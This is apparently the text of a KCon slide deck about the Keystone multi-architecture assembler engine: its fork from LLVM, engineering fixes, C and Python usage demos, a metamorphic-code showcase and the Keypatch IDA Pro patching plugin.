- Rewrite some components but keep the AsmParser, CodeEmitter & AsmBackend code intact (so it is easy to sync with LLVM in the future, e.g. for updates)
- Keep all the code in C++ to ease the job (unlike Capstone)
  - No need to rewrite complicated parsers
  - No need to fork llvm-tblgen

#### Issue 2

- LLVM is compiled into multiple libraries
  - Supported libs
  - Parser
  - TableGen, etc.
- Keystone needs to be a single library

#### **Solutions**

- Modify the linking setup to generate a single library
  - libkeystone.[so, dylib] + libkeystone.a
  - keystone.dll + keystone.lib



#### Issue 3

- Relocatable object code is generated for linking in the final code generation phase of the compiler
- Ex on X86:
  - inc [\_var1] → 0xff, 0x04, 0x25, A, A, A, A

#### **Solutions**

- Make the fixup phase detect & report missing symbols
- Propagate this error back to the top-level API ks\_asm()
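
A minimal sketch of this behavior, assuming a much simpler model than Keystone's real fixup phase: the encoder leaves a list of `(offset, symbol)` fixups, and the fixup step either patches in the resolved address or raises an error for the caller. The names `AsmError` and `apply_fixups`, and the address `0x601040`, are hypothetical.

```python
class AsmError(Exception):
    """Hypothetical error type, standing in for an assembler error code."""


def apply_fixups(code, fixups, symbols):
    """Patch 32-bit little-endian addresses into `code`.

    fixups  -- list of (offset, symbol_name) pairs recorded while encoding
    symbols -- dict mapping symbol names to addresses
    Raises AsmError instead of emitting a relocation for an unknown symbol.
    """
    missing = sorted({name for _, name in fixups if name not in symbols})
    if missing:
        raise AsmError("missing symbol(s): " + ", ".join(missing))
    patched = bytearray(code)
    for offset, name in fixups:
        patched[offset:offset + 4] = symbols[name].to_bytes(4, "little")
    return bytes(patched)


# inc [_var1] -> ff 04 25 A A A A, where A A A A is the unresolved address
code = b"\xff\x04\x25\x00\x00\x00\x00"
fixups = [(3, "_var1")]

try:
    apply_fixups(code, fixups, symbols={})
except AsmError as err:
    print("ERROR:", err)

# 0x601040 is an arbitrary example address
print(apply_fixups(code, fixups, symbols={"_var1": 0x601040}).hex())
```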

#### Issue 4

- Ex on ARM: blx 0x86535200 → 0x35, 0xf1, 0x00, 0xe1

#### **Solutions**

- ks\_asm() allows specifying the address of the first instruction
- Change the core to retain the address of each statement
- Find all relative branch instructions and fix their encoding according to the current & target addresses
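
Why the assembler must know the address of each statement is easiest to see on a simpler case than the ARM example: the x86 short jump (`EB rel8`), whose operand is the distance from the end of the instruction to the target. The helper `encode_jmp_short` below is a hypothetical illustration, not Keystone's code; the addresses are taken from the metame showcase in this deck.

```python
def encode_jmp_short(current: int, target: int) -> bytes:
    """Encode x86 `jmp rel8` (opcode EB) for an instruction located at `current`."""
    rel = target - (current + 2)   # relative to the end of the 2-byte instruction
    if not -128 <= rel <= 127:
        raise ValueError("target out of range for a short jump")
    return bytes([0xEB, rel & 0xFF])


print(encode_jmp_short(0x080cbd91, 0x080cbda0).hex())  # eb0d
print(encode_jmp_short(0x080cbd93, 0x080cbd96).hex())  # eb01
```

The same target encodes differently from a different position, so an assembler that ignores the current address cannot emit correct relative branches.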



#### Issue 5

- Ex on X86: vaddpd zmm1, zmm1, zmm1, x → "this is not an immediate"
- Returns llvm\_unreachable() on input it cannot handle

#### **Solutions**

- Fix all exits & propagate errors back to ks\_asm()
  - Parse phase
  - Code emit phase

#### Issue 6

- LLVM does not support non-LLVM syntax
  - We want other syntaxes like Nasm, Masm, etc.
- Bindings must be built from scratch
- Need to keep up with upstream code once we fork LLVM and maintain it ourselves

#### **Solutions**

- Extend the X86 parser for new syntaxes: Nasm, Masm, etc.
- Built the Python binding
- Extra bindings came later, from the community: NodeJS, Ruby, Go, Rust, Haskell & OCaml
- Keep syncing with LLVM upstream for important changes & bug fixes

#### Keystone is not LLVM



#### Fork and Beyond

- Independent & truly a framework
  - Does not give up on badly formed assembly
- Aware of the current code position (for relative branches)
- Much more compact in size, lightweight in memory
- Thread-safe, with multiple architectures supported in a single binary
- More flexible: supports X86 Nasm syntax
- Supports undocumented instructions: X86
- Provides bindings (Python, NodeJS, Ruby, Go, Rust, Haskell, OCaml as of August 2016)



#### Demo



```
/* test1.c */
#include <stdio.h>
#include <keystone/keystone.h>

// separate assembly instructions by ; or \n
#define CODE "INC ecx; DEC edx"

int main(int argc, char **argv)
{
    ks_engine *ks;
    ks_err err;
    size_t count;
    unsigned char *encode;
    size_t size;

    err = ks_open(KS_ARCH_X86, KS_MODE_32, &ks);
    if (err != KS_ERR_OK) {
        printf("ERROR: failed on ks_open(), quit\n");
        return -1;
    }

    if (ks_asm(ks, CODE, 0, &encode, &size, &count) != KS_ERR_OK) {
        printf("ERROR: ks_asm() failed & count = %lu, error = %u\n",
               count, ks_errno(ks));
    } else {
        size_t i;

        printf("%s = ", CODE);
        for (i = 0; i < size; i++) {
            printf("%02x ", encode[i]);
        }
        printf("\n");
        printf("Compiled: %lu bytes, statements: %lu\n", size, count);
    }

    // NOTE: free encode after usage to avoid leaking memory
    ks_free(encode);

    // close Keystone instance when done
    ks_close(ks);

    return 0;
}
```

```
% make
cc -o test1 test1.c -lkeystone -lstdc++ -lm

% ./test1
INC ecx; DEC edx = 41 4a
Compiled: 2 bytes, statements: 2
```

```
from keystone import *

# separate assembly instructions by ; or \n
CODE = b"INC ecx; DEC edx"

try:
    # Initialize engine in X86-32bit mode
    ks = Ks(KS_ARCH_X86, KS_MODE_32)
    encoding, count = ks.asm(CODE)
    print("%s = %s (number of statements: %u)" %(CODE, encoding, count))
except KsError as e:
    print("ERROR: %s" %e)
```

```
$ ./test1.py
INC ecx; DEC edx = [65, 74] (number of statements: 2)
```

#### Showcase: metame

Before / After disassembly comparison (figure). Recoverable details:

- `bd01000000` `mov ebp, 1` becomes `9c` `pushfd`, `31ed`, `inc ebp`, `9d` `popfd`
- The run of `90` (nop) bytes from `0x080cbd93` to `0x080cbd9f` becomes a chain of `eb01` short jumps (`jmp 0x80cbd96`, `jmp 0x80cbd99`, `jmp 0x80cbd9c`, `jmp 0x80cbd9f`), each skipping one filler byte
- `8bce` `mov ecx, esi`, `89e5` `mov ebp, esp` and `89c7` `mov edi, eax` appear to be replaced by sequences ending in `pop ecx`, `pop ebp` and `pop edi` (the first instruction of each pair is not legible)
- Unchanged on both sides: `eb10` `jmp 0x10012e1b`, `8b542410` `mov edx, dword [esp + 0x10]`, `8d4bff` `lea ecx, [ebx - 1]`, `e807eeffff`, `8b7c2454` `mov edi, dword [esp + 0x54]`, `eb0d` `jmp 0x80cbda0`
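One transformation visible in the comparison is a 13-byte run of `90` (nop) between `0x080cbd93` and `0x080cbd9f` turned into a chain of `eb01` short jumps, each hopping over a single filler byte. A minimal sketch of that idea on raw bytes follows. It is not metame's actual code: the function name `replace_nop_run` and the choice of filler opcodes are assumptions made for illustration.

```python
import itertools

NOP = 0x90
JMP_OVER_ONE = bytes([0xEB, 0x01])  # jmp short: skip the next single byte

# Assumed filler: one-byte x86-32 opcodes (pop edx, pop edi, inc eax).
# They are never executed because each one sits right behind a jmp +1.
FILLER = bytes([0x5A, 0x5F, 0x40])


def replace_nop_run(run_length, filler=FILLER):
    """Return run_length bytes with the same effect as run_length NOPs."""
    out = bytearray()
    filler_cycle = itertools.cycle(filler)
    # Each "jmp +1; filler" group takes 3 bytes
    while run_length - len(out) >= 3:
        out += JMP_OVER_ONE
        out.append(next(filler_cycle))
    # Anything that does not fit a full group stays a plain NOP
    out += bytes([NOP]) * (run_length - len(out))
    return bytes(out)


print(replace_nop_run(13).hex())  # prints: eb015aeb015feb0140eb015a90
```

The output has the same length as the original padding, so no surrounding addresses or jump targets need to be fixed up.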

### One More Thing

#### The IDA Pro



#### **IDA Pro**

- RE Standard
- Patching on the fly is always a must
- The broken "Edit\Patch Program\Assembler" feature always gives us problems









#### Keypatch



#### A binary editor plugin for IDA Pro

- Fully open source @ https://keystone-engine.org/keypatch
- On-the-fly patching in IDA Pro with multi-architecture support
- Based on Keystone Engine
- By Nguyen Anh Quynh & Thanh Nguyen (rd) from vnsecurity.net





```
                                ; CODE XREF: sub_158D3+21↑j
shl     esi, 4
jz      short loc_158F6
mov     edi, esi                ; size
call    malloc
test    rax, rax
xor     eax, eax                ; Keypatch modified this from:
                                ;   jz short loc_158F6
mov     ecx, 800h
mov     rdi, rax
mov     rsi, rbp
mov
```
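The listing shows `jz short loc_158F6` replaced by `xor eax, eax`; both encode to two bytes, so the patch fits exactly. A minimal sketch of the byte-level step, under stated assumptions: `patch_bytes` is a hypothetical helper, not Keypatch's API; the `05` jump displacement is made up for the example; and the NOP padding for shorter replacements is one possible policy, not necessarily what Keypatch does.

```python
NOP = 0x90


def patch_bytes(image, offset, old_size, new_code):
    """Overwrite old_size bytes at offset with new_code, NOP-padding the rest.

    Returns the original bytes so the patch can be reverted.
    """
    if len(new_code) > old_size:
        raise ValueError("replacement is longer than the original instruction")
    if offset < 0 or offset + old_size > len(image):
        raise ValueError("patch range is outside the image")
    original = bytes(image[offset:offset + old_size])
    padding = bytes([NOP]) * (old_size - len(new_code))
    image[offset:offset + old_size] = new_code + padding
    return original


# test rax, rax (48 85 c0); jz short +5 (74 05); mov ecx, 800h (b9 00 08 00 00)
image = bytearray.fromhex("4885c07405b900080000")
saved = patch_bytes(image, 3, 2, bytes.fromhex("31c0"))  # 31 c0 = xor eax, eax
print(saved.hex(), "->", image.hex())
```

In the real plugin, the replacement bytes would come from assembling the typed instruction with Keystone rather than from a hard-coded hex string.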

#### Latest Keypatch and DEMO


#### Fill Range

Select a start and end address, then fill the range with the given bytes

Go to: Edit | Keypatch | Fill Range
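Filling a range can be sketched as repeating a byte pattern across `[start, end)`. The helper `fill_range` below is hypothetical, and cutting the last repetition short when the pattern does not divide the range evenly is an assumption, not confirmed Keypatch behavior.

```python
def fill_range(image, start, end, pattern):
    """Overwrite image[start:end] with pattern repeated as often as needed."""
    if not pattern:
        raise ValueError("pattern must not be empty")
    if not 0 <= start <= end <= len(image):
        raise ValueError("range is outside the image")
    repeats, remainder = divmod(end - start, len(pattern))
    # The final repetition is cut short if the pattern does not fit evenly
    image[start:end] = pattern * repeats + pattern[:remainder]
    return image


image = bytearray(8)
fill_range(image, 2, 7, b"\x90")  # fill five bytes with NOPs
print(image.hex())  # prints: 0000909090909000
```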

QQ: 2880139049







## THANKS

[Hacker@KCon]